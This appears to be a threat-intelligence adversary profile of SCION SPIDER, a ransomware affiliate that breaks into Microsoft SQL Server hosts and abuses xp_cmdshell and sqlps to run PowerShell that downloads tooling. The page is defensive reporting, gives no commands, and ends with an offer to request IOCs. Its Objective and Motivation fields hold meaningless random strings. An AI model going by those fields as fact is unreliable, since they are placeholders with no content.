Scion Spider

Details

SCION SPIDER is a Ransomware-as-a-Service (RaaS) affiliate and achieves initial access by compromising servers running Microsoft SQL Server. The adversary typically uses the built-in SQL extended procedure xp_cmdshell to run shell commands and particularly favors the Microsoft SQL Server-native sqlps utility to run PowerShell (PS) commands that download additional tooling.  SCION SPIDER frequently...

Objective

  • 1SjX0xlEnW9RCOe

Motivation

  • OBZWsqHG

Contact our team about
IOCs for this adversary

?

During a cybersecurity incident, indicators of compromise (IoC) are clues and evidence of a data breach.

Unlock the adversary universe

Thank you for your request!

A member of our team will be in touch shortly.

CrowdStrike logo